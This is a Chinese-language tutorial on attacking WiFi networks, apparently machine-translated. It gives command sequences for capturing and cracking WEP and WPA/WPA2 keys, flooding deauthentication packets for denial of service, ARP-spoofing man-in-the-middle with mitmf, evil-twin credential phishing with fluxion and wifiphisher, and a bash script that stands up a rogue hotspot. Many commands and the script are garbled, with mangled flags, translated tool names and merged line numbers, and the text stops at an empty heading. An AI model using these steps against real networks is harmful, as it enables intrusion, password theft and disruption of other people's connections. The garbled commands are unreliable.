我們攻擊WIFI的第壹個想法是從保密出發,希望從無線系統獲取用戶的明文數據。首先我們知道WIFI的認證和加密方式主要有四種:OPEN(不加密)、WEP(RC4)、WPA(TKIP)和WPA2(CCMP)。
開放WIFI不采取認證和加密措施,任何用戶都可以鏈接到WIFI,用戶數據在BSS(基礎服務集)中明文傳輸,惡意用戶可以無門檻連接,然後通過中間人攻擊(SSL、SSH等)獲取用戶數據。需要其他工具)。如下圖所示:
具有WEP、WPA和WPA2認證加密模式的WIFI需要被破解獲取密碼,然後通過中間人或直接嗅探獲取用戶明文數據。步驟我就不細說了。WEP搶IVS包,WPA/WPA2搶握手包。
WEP大致如下:
BSSIDAP的MAC -c AP的airodump-ng-ivs-w/workspace/sniff/airmon-CHALLWLAN 1 mon #捕獲IVS數據包。
目標AP的airplay-ng-3-b MAC-h,連接到AP的站點的MAC wlan1mon #發送ARP包以獲得加速的ivs獲取。
aircrack-ng/workspace/sniff/airmon 02 . IVS
水漬險/WPA2大致如下:
airodump-ng-w/workspace/sniff/airmon-wpa 2-chanle WLAN 1 mon # BSSID目標AP的MAC -c AP所在的位置嗅探無線數據,抓取握手包。
airplay-ng-05-a目標AP的MAC -c向連接到該AP的站點的MAC wlan1mon #發送deauth包,以便更快地獲得握手。
Aircraft-ng-w妳的字典文件/workspace/sniff/airmon-wpa2 . cap #破解wpa 2密碼。
密碼成功破解後,可以通過中間人連接AP獲取用戶明文數據,也可以直接用wireshark抓取加密包,然後用airdecap-ng工具解密,再用wireshark讀取解密包。
破解WPA和WPA2不壹定能成功,就看妳的字典強大不強大了。這時候可以嘗試誘騙用戶主動輸入WIFI密碼。比如我們可以創建壹個和目標AP有相同ESSID的軟AP,用戶可以連接。瀏覽網頁時會彈出壹個假的認證頁面,告訴用戶必須輸入WIFI密碼,只要用戶輸入密碼我們就可以獲取。可以使用fluxion、wifiphisher等工具實現。
Wifiphisher將用戶輸入的密碼作為WiFi的密碼,但是這個密碼是不驗證的。如果用戶輸入錯誤,它也會提示輸入密碼。
Fluxion會用握手的方式檢查用戶輸入的密碼,成功的壹方認為已經獲取了密碼。
2.有效性
通過使目標用戶無法使用WIFI來破壞無線系統的可用性,通常是通過DOS攻擊來實現的,比如發送大量的deauth包來強制用戶站取消與AP的認證和連接。
aire play-0 100-對目標AP的MAC -c攻擊攻擊該站的MAC wlan1mon #發送大量deauth數據包,迫使目標站無法與AP連接。
Mdk3 wlan1mon a -a攻擊AP的MAC #mdk3,可以偽造大量的站與AP的連接,從而耗盡AP的資源,造成DOS攻擊。
3.真實性
(1)惡意用戶進入無線系統後,可以通過中間人攻擊獲取或修改用戶數據。
ARP欺騙或者DNS欺騙,ettercap工具非常方便。下面使用mitmf工具,通過ARP欺騙,將目標網頁中的所有圖片進行逆向。
mitmf -i wlan0 -欺騙- arp -網關192.168.2.1 -目標192.168.2 . 1-upsidedownternet
通過driftnet工具捕獲目標瀏覽網頁時的圖片。
漂流網-i wlan0
當然妳也可以用中間人攻擊做很多事情,比如獲取cookie,嵌入js,進壹步用牛肉攻擊。。。
(2)偽造AP進行釣魚攻擊。
airbase-ng-e airmon WLAN 1mon #創建釣魚熱點。
然後打開dhcp服務器(必須先安裝isc-dhcp-server),打開路由,打開系統轉發,打開防火墻nat等。
1 #!/bin/bash 2 3 echo '配置釣魚熱點...'45 serviceisc-DHCP-serverstop 6 RM/var/lib/DHCP/dhcpd . lease 7 touch/var/lib/DHCP/dhcpd . leases 8 9 ifconfig at 0 up 10 ifconfig at 0 10 . 0 . 0 . 1網絡掩碼255.255.255.011路由add -net 10.0.0.016睡眠517服務isc-DHCP-服務器啟動18 19 iptables-F20 iptables-T NAT-f 2654。38+0 22 #iptables -P轉發接受23 iptables -t nat -A後路由-o wlan0 -j偽裝
此時用戶無需密碼即可連接airmon hotspot上網,但此時可以通過嗅探at0網卡獲取用戶數據。
4.完整
篡改用戶數據在WIFI攻擊中似乎用處不大。
5.不可否認性